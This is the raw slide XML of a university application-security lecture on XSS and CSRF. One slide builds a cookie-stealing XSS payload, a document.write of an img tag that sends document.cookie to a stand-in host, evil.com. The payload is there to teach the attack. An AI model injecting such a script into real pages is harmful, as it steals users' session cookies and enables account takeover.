          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -35123"/>
              <a:gd name="adj2" fmla="val -8128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And now a malicious script that sends cookies for somesite.com to evil.com.  How to get a user to go there, though?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1752600"/>
            <a:ext cx="5867400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document.write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5C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C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5C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>='http://evil.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>?"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>   +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encode(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document.cookie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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"'/&gt;"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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;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script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endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman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6629400" y="609600"/>
            <a:ext cx="1905000" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -65980"/>
              <a:gd name="adj2" fmla="val 117973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Translation of the below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427427"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Todd's Franklin Template">
  <a:themeElements>
    <a:clrScheme name="Franklin University">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="133C5D"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="EEECE1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="4F749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Todd's Franklin Template</Template>
  <TotalTime>4755</TotalTime>
  <Words>3870</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>505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Todd's Franklin Template</vt:lpstr>
      <vt:lpstr>ISEC 400 Application Security Week 10</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Outcomes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XSS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CSRF in detail</vt:lpstr>
      <vt:lpstr>Upcoming deadlines</vt:lpstr>
      <vt:lpstr>Question &amp; answer</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Franklin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Course</dc:title>
  <dc:creator>Todd Whittaker</dc:creator>
  <cp:lastModifiedBy>Todd Whittaker</cp:lastModifiedBy>
  <cp:revision>134</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-23T19:29:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-11-12T23:09:14Z</dcterms:modified>
</cp:coreProperties>
</file>